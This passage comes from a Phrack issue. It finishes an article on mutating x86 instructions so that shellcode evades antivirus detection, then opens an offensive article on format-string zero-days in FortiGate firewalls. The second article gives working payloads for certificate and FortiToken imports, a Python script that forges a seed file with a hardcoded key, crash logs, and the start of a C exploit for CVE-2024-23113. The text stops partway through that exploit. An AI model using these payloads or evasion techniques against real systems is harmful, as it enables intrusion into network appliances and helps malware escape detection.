sbb rax,221133h ---------------> \x48\x1D\x33\x11\x22\x00
sbb rax,221133h ---------------> \x48\x81\xD8\x33\x11\x22\x00
Each of the instruction pairs does the exact same thing, with different
corresponding bytes. This is usually done automatically by the compiler
toolchains. Unfortunately, this type of shortening can only be applied
to certain instructions. Also, once you analyze the produced bytes,
you'll see that only the beginning part (the opcode bytes) changes; the
rest of the bytes, representing the operand values, stay exactly the
same. This is not good in terms of detection, because most
detection rules focus on the operand values. These are the reasons why
we need to focus on more complex ways of de-optimization.
Most modern compiler toolchains, such as LLVM, convert the code into
intermediate representations (IR) for applying complex optimizations.
IR languages make it very easy to manipulate the code and apply certain
simplifications independent from the target platform. At first glance,
using LLVM sounds very logical for achieving our objective in this study;
it already has various engines, libraries, and tooling built into the
framework for code manipulation. Unfortunately, this is not the case.
After getting into the endless rabbit hole of LLVM's inner workings, you
realize that IR-based optimizations are leaving behind certain patterns
in the code[10]. When the code is transformed into IR, whether from source
code or binary lifting[11], you lose control of individual instructions.
Because IR-based optimizations mainly focus on simplifying and shortening
well-structured functions instead of raw pieces of code, it makes it hard
to eradicate certain patterns. Maybe highly skilled LLVM wizards can hack
their way around these limitations, but we will go with manual disassembly
using the iced_x86[12] Rust disassembly library in this study. It will
help us thoroughly analyze the binary code and give us enough control
over the individual instructions.
Since our primary objective is to evade security products, while
de-optimizing the instructions, we also need to be sure that the
generated instruction sequence is also commonly generated by regular
compiler toolchains. This way, our obfuscated code can blend in with
the benign code, and rule-based detection will not be possible against
our transform gadgets.
In order to determine how common the generated instructions are, we can
write specific Yara rules for our transform gadgets, and run the rules on
a large dataset. For this study, a ~300 GB dataset consisting of executable
sections of various well-known benign EXE, ELF, SO, and DLL files has been
curated. We will simply run our Yara rules on this dataset and check the
false positive rate.
--[ 5 - Transform Gadgets
Now, we need a way of transforming individual instructions, while
maintaining the overall functionality of the program. In order to
achieve this, we will take advantage of basic math and numbers theory.
Most instructions in the x86 instruction set can be mapped to equivalent
mathematical operators. For example, the "ADD" instruction can be directly
translated to the addition operator "+". The following table shows various
translation examples:
MOV, PUSH, POP, LEA ---> =
CMP, SUB, SBB       ---> -
ADD, ADC            ---> +
IMUL, MUL           ---> *
IDIV, DIV           ---> /
TEST, AND           ---> &
OR                  ---> |
XOR                 ---> ^
SHL                 ---> <<
SHR                 ---> >>
NOT                 ---> '
With this approach, we can easily represent basic x86 instructions as
mathematical equations. For example, "MOV EAX, 0x01" can be represented
as "x = 1". A bit more complex example could be;
MOV ECX,8    ) -------------> z = 8       )
SHL EAX,2    ) -------------> 4x          )
SHL EBX,1    ) -------------> 2y          ) ---> ((4x+2y+8)**2)
ADD EAX,EBX  ) -------------> 4x+2y       )
ADD EAX,ECX  ) -------------> 4x+2y+8     )
IMUL EAX,EAX ) -------------> (4x+2y+8)^2 )
When dealing with code sequences that only contain operations of addition,
subtraction, multiplication, and positive-integer powers of variables,
formed expressions can be transformed using polynomial transformation
tricks. Similar "Data-flow optimization" tricks are being used by compiler
toolchains during code optimizations[9], but we can also leverage the same
principles for infinitely expanding the expressions. In the case of this
example, the above expression can be extended to:
(16x^2 + 16xy + 64x + 4y^2 + 32y + 64)
When this expression is transformed back into assembly code, you'll see
that multiple instructions are changed, new ones are added, and some
disappear. The only problem for us is that some instructions stay exactly
the same, which may still trigger detection. In order to prevent this, we
need to use other mathematical methods on a more individual level.
In the following sections, we'll analyze five different transform gadgets
that will be targeting specific instruction groups.
--[ 5.1 - Arithmetic Partitioning
Our first transform gadget will target all the arithmetic instructions
with an immediate type operand, such as MOV, ADD, SUB, PUSH, POP, etc.
Consider the following example; "ADD EAX, 0x10"
This simple ADD instruction can be considered the addition (+) operator
in the expression "X + 16". This expression can be infinitely extended
using the arithmetic partitioning method, such as:
(X + 16) = (X + 5 - 4 + 2 + 13)
When we encounter such instructions, we can simply randomize the
immediate value and add an extra instruction for fixing it. Based on
the randomly generated immediate value, we need to choose between the
original mnemonic, or the arithmetic inverse of it.
In order to keep the generated code under the radar, only one level of
partitioning (additional fix instruction) will suffice. Applying many
arithmetic operations to a single destination operand might create a
recognizable pattern. Here are some other examples:
mov edi,0C000008Eh ---+-> mov edi,0C738EE04h
                      +-> sub edi,738ED76h
add al,10h ------------+-> add al,0D8h
                       +-> sub al,0C8h
sub esi,0A0h ----------+-> sub esi,5062F20Ch
                       +-> add esi,5062F16Ch
push 0AABBh -----------+-> push 7F08C11Dh
                       +-> sub dword ptr [esp],7F081662h
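A sketch of the transform logic itself, using wrapping 32-bit
arithmetic just like the CPU does (the printed assembly is illustrative
output, not what the actual tool emits):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    uint32_t imm = 0x10;             /* original immediate          */
    uint32_t rnd = (uint32_t)rand(); /* randomized immediate        */
    uint32_t fix = rnd - imm;        /* rnd - fix == imm (mod 2^32) */
    printf("add eax,%08Xh\n", rnd);
    printf("sub eax,%08Xh\n", fix);
    return 0;
}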
Upon testing how frequent the generated code sequences are on our sample
dataset, we see that ~38% of the compiler-generated sections contain such
instruction sequences. This means that more than one of every three
compiled binary files contains these instructions, which makes the
transformed code very hard to distinguish from benign code.
--[ 5.2 - Logical Inverse
This transform gadget will target half of the logical operation
instructions with an immediate operand such as AND, OR, or XOR.
Consider the following example; "XOR R10, 0x10" This simple XOR
instruction can be written as "X ^ 16". This expression can be
transformed using the properties of the logical inverse, such as;
(X ^ 16) = (X' ^ 16') = (X' ^ -17)
Once we encounter such instructions, we can simply transform the
instructions by taking the inverse of the immediate value and adding
an additional NOT instruction for taking the inverse of the destination
operand. The same logic can also be applied to other logical operands.
"AND AL, 0x10" instructions can be expressed as "X & 16". Using the same
logical inverse trick, we can transform this expression into;
(X & 16) = (X' | 16') = (X' | -17)
For the case of AND and OR mnemonics, the destination operand needs to
be restored with an additional NOT instruction at the end. Here are some
other examples:
xor r10d,49656E69h ---+-> not r10d
                      +-> xor r10d,0B69A9196h
                       +-> not al
and al,1 --------------+-> or al,0FEh
                       +-> not al
                       +-> not edx
or edx,300h -----------+-> and edx,0FFFFFCFFh
                       +-> not edx
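These identities are easy to sanity-check with unsigned integers of the
matching width:

#include <assert.h>
#include <stdint.h>

int main(void)
{
    uint32_t x = 0xDEADBEEF, imm = 0x49656E69;
    /* XOR: the two complements cancel, no trailing NOT needed */
    assert((~x ^ ~imm) == (x ^ imm));
    /* AND and OR follow De Morgan, so a trailing NOT restores them */
    assert(~(~x | ~imm) == (x & imm));
    assert(~(~x & ~imm) == (x | imm));
    return 0;
}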
As mentioned earlier in this article, pattern-based detection rules
written for detecting malicious "code" mostly target the immediate
values on the instructions. So, using this simple logical inverse
trick will sufficiently mutate the immediate value without creating
any recognizable patterns.
After testing the frequency of the generated code sequences, we see
that ~10% of the compiler-generated sections contain such instruction
sequences. This is high enough that any detection rule for this
specific transform won't be used by AV vendors due to the potential
for high false positives.
--[ 5.3 - Logical Partitioning
This transform gadget will target the remaining half of the logical
operation instructions with an immediate operand such as ROL, ROR,
SHL, or SHR. In the case of shift instructions, we can split the
shift operation into two parts.
Consider the following example; "SHL AL, 0x05".
This instruction can be split into "SHL AL, 0x2" and "SHL AL, 0x3". The
resulting AL value and the condition flags will always be the same. In
the case of rotate instructions, there is a simpler way to mutate the
immediate value.
The destination operand of these logical operations is either a register,
or a memory location with a defined size. Based on the destination operand
size, the rotate immediate value can be changed accordingly.
Consider the following example: "ROL AL, 0x01"
This instruction will rotate the bits of the AL register once to the left.
Since AL is an 8-bit register, the "ROL AL, 0x09" instruction will have
the exact same effect. Rotate transforms are very effective for keeping
the mutated code size low since we don't need extra instructions.
Here are some other examples:
shr rbx,10h -------------+-> shr rbx,8
                         +-> shr rbx,8
shl qword ptr [ecx],20h -+-> shl qword ptr [ecx],10h
                         +-> shl qword ptr [ecx],10h
ror eax,0Ah ---------------> ror eax,4Ah
rol rcx,31h ---------------> rol rcx,0B1h
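Quick checks confirm both equivalences over all 8-bit values:

#include <assert.h>
#include <stdint.h>

static uint8_t rol8(uint8_t v, unsigned n)
{
    n &= 7; /* an 8-bit rotate count is effectively mod 8 */
    return (uint8_t)((v << n) | (v >> ((8 - n) & 7)));
}

int main(void)
{
    for (unsigned v = 0; v < 256; v++) {
        /* ROL AL,9 has the same result as ROL AL,1 */
        assert(rol8((uint8_t)v, 9) == rol8((uint8_t)v, 1));
        /* SHL AL,5 equals SHL AL,2 followed by SHL AL,3 */
        assert((uint8_t)(v << 5) ==
               (uint8_t)((uint8_t)(v << 2) << 3));
    }
    return 0;
}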
These transforms modify the condition flags the exact same way as the
original instruction, and thus can be used safely without any additional
save/restore instructions. Since the transformed code is very small,
writing an effective Yara rule becomes quite hard. After testing the
frequency of the generated code sequences, we see that ~%59 of the
compiler-generated sections contain such instruction sequences.
--[ 5.4 - Offset Mutation
This transform gadget will target all the instructions with a memory-type
operand. For a better understanding of the memory operand type, let's
deconstruct the memory addressing logic of the x86 instruction set.
Any instruction with a memory operand needs to define a memory location
represented inside square brackets. This form of representation may
contain base registers, segment prefix registers, positive and negative
offsets, and positive scale vectors. Consider the following instruction:
MOV CS:[EAX+0x100*8]
    |    |    |   |
    |    |    |   +---> Scale Vector
    |    |    +---> Displacement Offset
    |    +---> Base Register
    +---> Segment Register
A valid memory operand can contain any combination of these fields. If it
only contains a large (the same size as the bitness) displacement offset,
then it can be called an absolute address. Our Offset Mutation Transform
gadget will specifically target memory operands with a base register. We
will be using basic arithmetic partitioning tricks on the memory
displacement value of the operand.
The "MOV RAX, [RAX+0x10]" instruction moves 16 bytes from the [RAX+0x10]
memory location onto itself. Such move operations are very common because
of operations like referencing a pointer. For mutating the memory operand
values, we can simply manipulate the contents of the RAX register.
Adding a simple ADD/SUB instruction with RAX before the original
instruction will enable us to mutate the displacement offset.
Here are some examples:
mov rax,[rax] -------+-> add rax,705EBC8Dh
                     +-> mov rax,[rax-705EBC8Dh]
mov rax,[rax+10h] ---+-> sub rax,20DA86AAh
                     +-> mov rax,[rax+20DA86BAh]
lea rcx,[rcx] -------+-> add rcx,0D5F14ECh
                     +-> lea rcx,[rcx-0D5F14ECh]
In each of these example cases, the destination operand is the base
register inside the memory operand (pointer referencing). For the other
cases, we need additional instructions at the end for preserving the
base register contents. Here are some other examples:
                            +-> add rax,4F037035h
mov [rax],edi --------------+-> mov [rax-4F037035h],edi
                            +-> sub rax,4F037035h
                            +-> add rbx,34A92BDh
mov rcx,[rbx+28h] ----------+-> mov rcx,[rbx-34A9295h]
                            +-> sub rbx,34A92BDh
                            +-> sub rbp,2841821Ch
mov dword ptr [rbp+40h],1 --+-> mov dword ptr [rbp+2841825Ch],1
                            +-> add rbp,2841821Ch
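The displacement math is the same wrapping-arithmetic trick applied to
the memory operand; a sketch (again, illustrative output rather than the
real tool):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    long long disp  = 0x28;   /* original displacement           */
    long long delta = rand(); /* random base-register adjustment */
    long long eff   = disp - delta;
    printf("add rbx,%llXh\n", (unsigned long long)delta);
    /* (rbx + delta) + (disp - delta) == rbx + disp */
    if (eff < 0)
        printf("mov rcx,[rbx-%llXh]\n", (unsigned long long)-eff);
    else
        printf("mov rcx,[rbx+%llXh]\n", (unsigned long long)eff);
    printf("sub rbx,%llXh\n", (unsigned long long)delta);
    return 0;
}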
The offset mutation transform can be applied to any instruction with a
memory operand. Unfortunately, this transform may affect the condition
flags.
In such a scenario, instead of adding extra save/restore instructions,
we can check if the manipulated condition flags are actually affecting
the control flow of the application by tracing the next instructions.
If the manipulated condition flags are being overwritten by another
instruction, we can safely use this transform. Due to the massive scope
of this transform gadget, it becomes quite hard to write an effective
Yara rule. We can easily consider the instruction mutated by this
transform to be common, and undetectable.
--[ 5.5 - Register Swapping
This transform gadget will target all the instructions with a register-
type operand, which can be considered a very large scope. This may be
the most basic but still effective transformation in our arsenal.
After the immediate and memory operand types, the register is the third
most common operand type that is being targeted by detection rules. Our
goal is to replace the register used in an instruction with another
register of the same size, using the XCHG instruction.
Consider the "XOR RAX,0x10" instruction. We can swap the RAX register
with any other 64-bit register by exchanging the values before and after
the original instruction. Here are some examples:
+-> xchg rax,rcx
xor rax,10h --------+-> xor rcx,10h
+-> xchg rax,rcx
+-> xchg rbx,rsi
and rbx,31h --------+-> and rsi,31h
+-> xchg rbx,rsi
+-> xchg rdx,rdi
mov rdx,rax --------+-> mov rdi,rax
+-> xchg rdx,rdi
This transform does not modify any of the condition flags, and can be
used safely without any additional save/restore instructions.
The generated sequence of instructions may seem uncommon, but due to the
scope of this transform and the small size of the exchange instructions,
the generated sequence of bytes is found to be very frequent in our sample
data set. After testing the frequency of the generated code sequences, we
see that ~92% of the compiler-generated sections contain such instruction
sequences.
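In generator form, the whole gadget is an XCHG sandwich. A minimal Python
sketch (again a textual toy with made-up names); RSP and RBP are left out
of the candidate pool on the assumption that blindly swapping stack
registers is rarely safe:
--------------------------------------------------------------------------
import random

GPR64 = ["rax", "rbx", "rcx", "rdx", "rsi", "rdi",
         "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]

# Wrap an instruction in an XCHG pair so it runs on a substitute register.
# `used` holds the registers the instruction already touches.
def swap_register(text, reg, used):
    sub = random.choice([r for r in GPR64 if r != reg and r not in used])
    return ["xchg %s,%s" % (reg, sub),
            text.replace(reg, sub),
            "xchg %s,%s" % (reg, sub)]

print("\n".join(swap_register("xor rax,10h", "rax", used={"rax"})))
--------------------------------------------------------------------------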
--[ 6 - Address Realignments
After using any of these transform gadgets, an obvious outcome will be the
increased code size due to the additional number of instructions. This
will cause misalignments in the branch operations and relative memory
addresses. While de-optimizing each instruction, we need to be aware
of how much the original instruction size is increased so that we can
calculate a delta value for aligning each of the branch operations.
This may sound complex, simply because it is :) Handling such address
calculations is easy when you have the source code of the program. But
if you only have an already-compiled binary, address alignment becomes
a bit tricky. We will not dive into the line-by-line implementation of
post-de-optimization address realignment; the only thing to keep in mind
is double-checking branch instructions after the alignment.
There is a case where branch instructions (conditional jumps) increase in
size when they are modified to branch to much more distant addresses.
This specific issue causes a recursive misalignment and requires another
realignment pass after each fix on branch targets.
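A minimal sketch of that fix-point loop, over a toy instruction model
(sizes plus branch-target indices; a real implementation would of course
work on decoded instructions and re-encode them):
--------------------------------------------------------------------------
# Recompute addresses until no conditional jump needs to grow from its
# 2-byte rel8 form to the 6-byte rel32 form; each growth can push other
# targets out of rel8 range, hence the outer loop.
def realign(instructions):
    changed = True
    while changed:
        changed = False
        addrs, addr = [], 0
        for ins in instructions:         # addresses under current sizes
            addrs.append(addr)
            addr += ins["size"]
        for i, ins in enumerate(instructions):
            if "target" not in ins:
                continue
            rel = addrs[ins["target"]] - (addrs[i] + ins["size"])
            if ins["size"] == 2 and not -128 <= rel <= 127:
                ins["size"] = 6          # rel8 -> rel32
                changed = True
    return instructions

code = [{"size": 2, "target": 2}, {"size": 200}, {"size": 1}]
print([ins["size"] for ins in realign(code)])   # [6, 200, 1]
--------------------------------------------------------------------------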
--[ 7 - Known Limitations
There are some known limitations while using these transform gadgets.
The first and most obvious one is the limited scope of supported
instruction types. There are some instruction types that cannot be
transformed with the mentioned gadgets. Instructions with no operands
are one of them. Such instructions are very hard to transform since
they do not have any operands to mutate. The only thing we can do is
relocate them somewhere else in the code.
This is not a very big problem because the frequency of unsupported
instructions is very low. In order to find out how frequently an
instruction is being generated by compilers, we can calculate frequency
statistics on our previously mentioned sample data set. The following
list contains the frequency statistics of the most common x86 instructions.
1. 33.5% MOV
2. 9.2% JCC (All conditional jumps)
3. 6.4% CALL
4. 5.5% LEA
5. 4.9% CMP
6. 3.9% ADD
7. 3.7% TEST
8. 3.5% JMP
9. 3.3% PUSH
10. 3.0% POP
11. 2.7% NOP
12. 2.2% XOR
13. 1.7% SUB
14. 1.5% INT3
15. 1.1% MOVZX
16. 1.0% AND
17. 1.0% RET
18. 0.6% SHL
19. 0.5% OR
20. 0.5% SHR
- 11.3% (all others)
Similar instruction frequency studies[13] on the x86 instruction set have
been made on different sample sets, and their results closely parallel
the list above. The instruction frequency list
shows that only around 5% of the instructions are not supported by our
transform gadgets.
As can be seen in the list, the most commonly used instructions are
simple load/store, arithmetic, logic, and branch instructions. This
means that, if implemented properly, the previously explained transform
gadgets are able to transform ~95% of the instructions of compiler-
generated programs.
This can be considered more than enough to bypass rule-based detection
mechanisms. Another known limitation is self-modifying code. If the code
is overwriting itself, our transform gadgets will probably break the code.
Some code may also be using branch instructions with dynamically
calculated branch targets; in such cases, the address realignment becomes
impossible without using code emulation. Lucky for us, such code is not
very commonly produced by compiler toolchains. Another rare condition is
overlapping instructions. Under certain circumstances, compiler toolchains
generate instructions that can be executed differently when branched into
the middle of the instruction. Consider the following example:
0000: B8 00 03 C1 BB mov eax, 0xBBC10300
0005: B9 00 00 00 05 mov ecx, 0x05000000
000A: 03 C1 add eax, ecx
000C: EB F4 jmp $-10
000E: 03 C3 add eax, ebx
0010: C3 ret
The JMP instruction will land on the third byte of the five-byte MOV
instruction at address 0000. It will create a completely new instruction
stream with a new alignment. This situation is very hard to detect without
some code emulation.
Another thing to consider is code with data inside. This is also a very
rare condition, but in certain circumstances, code can contain strings of
data. The most common scenario for such a condition is string operations
in shellcodes. It is very hard to differentiate between code and data when
there are no structured file formats or code sections.
Under such circumstances, our de-optimizer tool may treat data as code and
corrupt it by trying to apply transforms; but this can be avoided to some
extent during disassembly. Instead of using linear sweep[14] disassembly,
control flow tracing with a depth-first search[14] approach can be used
to skip data bytes inside the code.
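As a sketch, the depth-first tracing boils down to the following, with
"decode" standing in for a real disassembler; the toy program below hides
six data bytes behind an unconditional jump:
--------------------------------------------------------------------------
# Depth-first control flow tracing: only addresses reachable through
# branches and fall-throughs are marked as code, so inline data bytes
# are never disassembled.
def trace(decode, entry):
    seen, stack = set(), [entry]
    while stack:
        addr = stack.pop()
        if addr in seen:
            continue
        seen.add(addr)
        size, targets, falls_through = decode(addr)
        stack.extend(targets)
        if falls_through:
            stack.append(addr + size)
    return sorted(seen)

# addr -> (size, branch targets, falls through): a jmp over data, then ret
toy = {0: (2, [8], False), 8: (1, [], False)}
print(trace(lambda a: toy[a], 0))   # [0, 8] -- bytes 2..7 stay data
--------------------------------------------------------------------------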
--[ 8 - Conclusion
In this article, we have underlined real-life evasion challenges commonly
encountered by security professionals, and introduced several alternative
ways of solving these challenges by de-optimizing individual x86
instructions. The known limitations of these methods have proven not to
be a critical obstacle to the objective of this study.
These de-optimization methods have been found to be highly effective for
eliminating any pattern in machine code. A POC de-optimizer tool[3] has
been developed during this study to test the effectiveness of these
de-optimization methods. The tests are conducted by de-optimizing all the
available Metasploit[15] shellcodes and checking the detection rates via
multiple memory-based scanners and online analysis platforms.
The test results show these de-optimization methods to be highly
effective against pattern-based detection while avoiding the
use of self-modifying code (RWE memory use). Of course, as in every study
on evasion, the real results will emerge over time after the release of
this open-source POC tool.
--[ 9 - References
- [1] https://github.com/forrest-orr/moneta
- [2] https://github.com/hasherezade/pe-sieve
- [3] https://github.com/EgeBalci/deoptimizer
- [4] https://github.com/hasherezade/pe-sieve/blob/603ea39612d7eb81545734c63dd1b4e7a36fd729/params_info/pe_sieve_params_info.cpp#L179
- [5] https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong
- [6] https://github.com/EgeBalci/sgn
- [7] https://github.com/zeroSteiner/crimson-forge
- [8] https://github.com/weak1337/Alcatraz
- [9] https://en.wikipedia.org/wiki/Optimizing_compiler
- [10] https://monkbai.github.io/files/sp-22.pdf
- [11] https://github.com/lifting-bits/mcsema
- [12] https://docs.rs/iced-x86/latest/iced_x86/
- [13] https://www.strchr.com/x86_machine_code_statistics
- [14] http://infoscience.epfl.ch/record/167546/files/thesis.pdf
- [15] https://github.com/rapid7/metasploit-framework
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x10 of 0x11
|=-----------------------------------------------------------------------=|
|=--------------------=[ Long Live Format Strings ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Mark Remarkable ]=-------------------------=|
|=-----------------------------------------------------------------------=|
0. Introduction
1. Finding Format String Bugs
2. Beating a Dead Firewall
---[ 0 - Introduction
Format string attacks should be dead. glibc's FORTIFY_SOURCE was released
nearly 20 years ago. It's enabled by default. Vulnerabilities are trivial
to detect with static source code analysis. You have to be actively trying
to make a vulnerable piece of software. And yet, despite the existence of
foolproof protections, we still see multi-billion dollar companies ship
code with obvious format string vulnerabilities.
This article will consist of a few lines of code and a few boring 0-days,
just to keep the reader interested.
---[ 1 - Finding Format String Bugs
Most format strings are hardcoded, or at least come from a small set of
possible values. The exceptions to this pattern are what introduce format
string bugs. Modern reverse engineering tools make it incredibly easy to
filter format string function calls down to the 1% of exceptions. Although
there are better scripts out there, this simple Binary Ninja script was
good enough to find a few quick 0days:
fns={
"printf":0,
"fprintf":1,
"dprintf":1,
"sprintf":1,
"snprintf":2,
"vprintf":0,
"vfprintf":1,
"vsprintf":1,
"vsnprintf":2,
}
def check(function,arg):
    for caller in function.caller_sites:
        try: inst=caller.mlil.ssa_form
        except KeyboardInterrupt as e: return
        except Exception: continue
        if inst is None: continue
        op=inst.operation
        if op in (MediumLevelILOperation.MLIL_CALL_SSA,
                  MediumLevelILOperation.MLIL_CALL_UNTYPED_SSA,
                  MediumLevelILOperation.MLIL_TAILCALL_SSA):
            if len(inst.params)<=arg: continue
            # report calls whose format argument is not a constant
            if inst.params[arg].operation!=MediumLevelILOperation.MLIL_CONST_PTR:
                print(hex(caller.address),function.name)
for name,arg in fns.items():
    for f in bv.get_functions_by_name(name):
        check(f,arg)
---[ 2 - Beating a Dead Firewall
---- [ 2.1 - Certificate import
Importing a certificate is easy:
1. System -> Certificates -> Create/Import -> Certificate
-> Import Certificate -> Certificate
2. Add a valid certificate file and key file
3. Set the certificate name to %4919$1$c%n%n%n%n%n%n%n%n%n
4. Click create
Internal server error? Let's check the crash log.
# diagnose debug crashlog read
<02946> firmware FortiGate-VM64 v7.2.7,build1577b1577,240131 (GA.M) (Release)
<02946> application httpsd
<02946> *** signal 11 (Segmentation fault) received ***
<02946> Register dump:
<02946> RAX: 0000000010c9dde0 RBX: 0000000010caf09c
<02946> RCX: 00007fffd366e008 RDX: 00007f132d45bfc0
<02946> R08: 0000000010c97050 R09: 00007f132d49abe0
<02946> R10: 0000000000004000 R11: 0000000000000000
<02946> R12: 00007fffd3668570 R13: 0000000000001337
<02946> R14: 0000000000000009 R15: 00000000000006d9
<02946> RSI: 00007fffd366a288 RDI: 00007fffd366e000
<02946> RBP: 00007fffd3668dd0 RSP: 00007fffd3668480
<02946> RIP: 00007f132d346c6c EFLAGS: 0000000000010212
<02946> CS: 0033 FS: 0000 GS: 0000
<02946> Trap: 000000000000000e Error: 0000000000000004
<02946> OldMask: 0000000000000000
<02946> CR2: 00007fffd366e000
<02946> stack: 0x7fffd3668480 - 0x7fffd366d490
<02946> Backtrace:
<02946> [0x7f132d346c6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<02946> [0x7f132d34905d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<02946> [0x7f132d35c826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<02946> [0x7f132d335d42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<02946> [0x0222351b] => /bin/httpsd
<02946> [0x02223a65] => /bin/httpsd
<02946> [0x00ddb567] => /bin/httpsd
<02946> [0x00d08dc4] => /bin/httpsd
<02946> [0x00d09419] => /bin/httpsd
<02946> [0x00d0b547] => /bin/httpsd
<02946> [0x00d0d01d] => /bin/httpsd
<02946> [0x00caeef9] => /bin/httpsd
<02946> [0x00e9984a] => /bin/httpsd (ap_run_handler+0x0000004a)
<02946> [0x00e9a0a6] => /bin/httpsd (ap_invoke_handler+0x000000c6)
<02946> [0x00ee1ec9] => /bin/httpsd
<02946> [0x00ee2111] => /bin/httpsd (ap_process_request+0x00000021)
<02946> [0x00eda23f] => /bin/httpsd
<02946> [0x00e9e0aa] => /bin/httpsd (ap_run_process_connection+0x0000004a)
<02946> [0x00eb3cb7] => /bin/httpsd
<02946> [0x00eb3f86] => /bin/httpsd
<02946> [0x00eb4174] => /bin/httpsd
<02946> [0x00eb47ad] => /bin/httpsd
<02946> [0x00eafa51] => /bin/httpsd (ap_run_mpm+0x00000061)
<02946> [0x00eaf586] => /bin/httpsd
<02946> [0x00449f6f] => /bin/httpsd
<02946> [0x0044f498] => /bin/httpsd
<02946> [0x0044fc8a] => /bin/httpsd
<02946> [0x004524af] => /bin/httpsd
<02946> [0x00452dd9] => /bin/httpsd
<02946> [0x7f132d305deb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<02946> [0x004450da] => /bin/httpsd
R13 contains 0x1337, which just so happens to be the exact number of bytes
we just printed with %4919$1$c. Looks like a vuln to me!
---- [ 2.2 - FortiToken import
MFA solves all security problems, and Fortinet makes MFA easy with
FortiTokens. Let's generate some FortiToken seed files:
----- ftk.py -----
import base64
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# lol hardcoded key
FTK_KEY="3F2FE4F6E40B53CFF0B5948993F4D4AB369C7F0375FDC92D64CB3E8880FFAE4E"
FTK_KEY=bytes.fromhex(FTK_KEY)
format_str=b'%4919$1$c%n%n%n '
iv=b'\0'*16
a=Cipher(algorithms.AES(FTK_KEY), modes.CBC(iv), backend=default_backend())
e=a.encryptor()
ct=e.update(format_str)
ciphertext=base64.b64encode(ct).decode()
print(f"FTK00000000000EA,{ciphertext},{iv.hex()}")
----- ftk.py -----
$ python3 ftk.py > poc.ftk
Importing a seed file is easy:
1. User & Authentication -> FortiTokens -> Create New -> Import -> Seed File
2. Upload poc.ftk
Hmm... what's this? Another error? Let's see what the crashlog has to say:
<02664> firmware FortiGate-VM64 v7.2.7,build1577b1577,240131 (GA.M) (Release)
<02664> application httpsd
<02664> *** signal 11 (Segmentation fault) received ***
<02664> Register dump:
<02664> RAX: 0000000010da2830 RBX: 0000000010db020c
<02664> RCX: 00007ffd536af008 RDX: 00007fd3f60e3fc0
<02664> R08: 0000000010d981c0 R09: 00007fd3f6122be0
<02664> R10: 0000000000000010 R11: 0000000000000000
<02664> R12: 00007ffd536a7900 R13: 0000000000001337
<02664> R14: 0000000000000004 R15: 0000000000000a67
<02664> RSI: 00007ffd536a9618 RDI: 00007ffd536af000
<02664> RBP: 00007ffd536a8160 RSP: 00007ffd536a7810
<02664> RIP: 00007fd3f5fcec6c EFLAGS: 0000000000010212
<02664> CS: 0033 FS: 0000 GS: 0000
<02664> Trap: 000000000000000e Error: 0000000000000004
<02664> OldMask: 0000000000000000
<02664> CR2: 00007ffd536af000
<02664> stack: 0x7ffd536a7810 - 0x7ffd536acfc0
<02664> Backtrace:
<02664> [0x7fd3f5fcec6c] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
00064c6c
<02664> [0x7fd3f5fd105d] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0006705d
<02664> [0x7fd3f5fe4826] => /usr/lib/x86_64-linux-gnu/libc.so.6 liboffset
0007a826
<02664> [0x7fd3f5fbdd42] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__snprintf+0x00000092) liboffset 00053d42
<02664> [0x0290048a] => /bin/httpsd
<02664> [0x00de6fbd] => /bin/httpsd
<02664> [0x00d08dc4] => /bin/httpsd
<02664> [0x00d09419] => /bin/httpsd
<02664> [0x00d0b547] => /bin/httpsd
<02664> [0x00d0d01d] => /bin/httpsd
<02664> [0x00caeef9] => /bin/httpsd
<02664> [0x00e9984a] => /bin/httpsd (ap_run_handler+0x0000004a)
<02664> [0x00e9a0a6] => /bin/httpsd (ap_invoke_handler+0x000000c6)
<02664> [0x00ee1ec9] => /bin/httpsd
<02664> [0x00ee2111] => /bin/httpsd (ap_process_request+0x00000021)
<02664> [0x00eda23f] => /bin/httpsd
<02664> [0x00e9e0aa] => /bin/httpsd (ap_run_process_connection+0x0000004a)
<02664> [0x00eb3cb7] => /bin/httpsd
<02664> [0x00eb3f86] => /bin/httpsd
<02664> [0x00eb3fcb] => /bin/httpsd
<02664> [0x00eb48e5] => /bin/httpsd
<02664> [0x00eafa51] => /bin/httpsd (ap_run_mpm+0x00000061)
<02664> [0x00eaf586] => /bin/httpsd
<02664> [0x00449f6f] => /bin/httpsd
<02664> [0x0044f498] => /bin/httpsd
<02664> [0x0044fc8a] => /bin/httpsd
<02664> [0x004524af] => /bin/httpsd
<02664> [0x00452dd9] => /bin/httpsd
<02664> [0x7fd3f5f8ddeb] => /usr/lib/x86_64-linux-gnu/libc.so.6
(__libc_start_main+0x000000eb) liboffset 00023deb
<02664> [0x004450da] => /bin/httpsd
Unsurprisingly, this crash looks almost identical to the last one. The only
difference is the stack trace, which shows
(__snprintf+0x00000092) liboffset 00053d42
[0x0290048a] => /bin/httpsd
[0x00de6fbd] => /bin/httpsd
[0x00d08dc4] => /bin/httpsd
rather than
(__snprintf+0x00000092) liboffset 00053d42
[0x0222351b] => /bin/httpsd
[0x02223a65] => /bin/httpsd
[0x00ddb567] => /bin/httpsd
---- [ 2.3 - CVE-2024-23113
Does CVE-2024-23113 sound too complicated? In reality, it's as shrimple as
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
char *payload=\
"reply 200\r\n"\
"request=auth\r\n"\
"mgmtip=%270441$1$c%n%n%n%n%n%n%n%n%n%n\r\n"\
"\r\n";
#define HOST "69.69.69.69"
#define PORT 541
